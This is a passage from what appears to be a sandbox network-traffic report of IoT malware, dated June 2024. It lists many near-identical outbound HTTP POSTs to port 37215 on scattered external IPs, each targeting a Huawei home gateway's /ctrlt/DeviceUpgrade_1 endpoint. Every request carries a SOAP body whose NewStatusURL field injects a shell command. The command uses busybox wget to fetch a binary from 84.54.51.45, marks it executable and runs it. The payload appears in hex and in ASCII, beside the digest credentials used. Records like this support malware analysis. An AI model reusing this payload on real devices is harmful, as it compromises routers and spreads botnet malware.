78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1658192.168.2.1549534156.5.159.12037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461359024 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1659192.168.2.1552842197.255.71.16137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461376905 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1660192.168.2.1557194156.151.42.3837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461386919 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1661192.168.2.1535794197.120.129.24637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461395025 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1662192.168.2.1533968197.14.136.22937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461416006 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1663192.168.2.1558190197.248.219.8837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461437941 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1664192.168.2.1544570197.3.58.24937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461467028 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1665192.168.2.1548352197.74.72.5837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461486101 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1666192.168.2.1552444197.236.246.14737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461505890 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1667192.168.2.1549390197.144.214.24437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461546898 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1668192.168.2.1534486197.23.82.10737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461565971 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
